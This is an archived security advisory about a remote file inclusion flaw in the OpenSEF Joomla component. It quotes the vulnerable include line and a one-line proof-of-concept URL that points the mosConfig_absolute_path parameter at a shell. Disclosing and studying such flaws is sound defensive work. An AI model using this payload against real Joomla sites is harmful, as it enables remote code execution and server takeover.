<<< Date Index >>>     <<< Thread Index >>>

Modification For OpenSEF Remote file Inclusion



                
###########################################################################################
                #                       Aria-Security.net Advisory              
                          #
                #                       Discovered  by: O.U.T.L.A.W             
                          #                     #                       < 
www.Aria-security.net >                                         #
                #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp    
                          #
                #                                                               
                          #
                
###########################################################################################


#Software: OpenSEF
#Attack method: Remote File Inclusion
#Description : OpenSEF is a Joomla component that extends the built-in SEF 
(Search Engine Friendly) 
#Source:
   
 require_once( $mosConfig_absolute_path . '/includes/sef.php' );
  } else {
    // Joomla!'s SEF option is turned off; revert to Joomla!'s original-style
    //


************************************************************************************

                                                                                
          
#Proof of Concept:                                                              
          
#http://www.site.com/sef.php?mosConfig_absolute_path=SHELL
#                                                         
#----------------------------------------------------------                     
          
#                                                                               
                                                                                
          
#                                                                               
                  
#Contact : Outlaw@xxxxxxxxxxxxxxxxx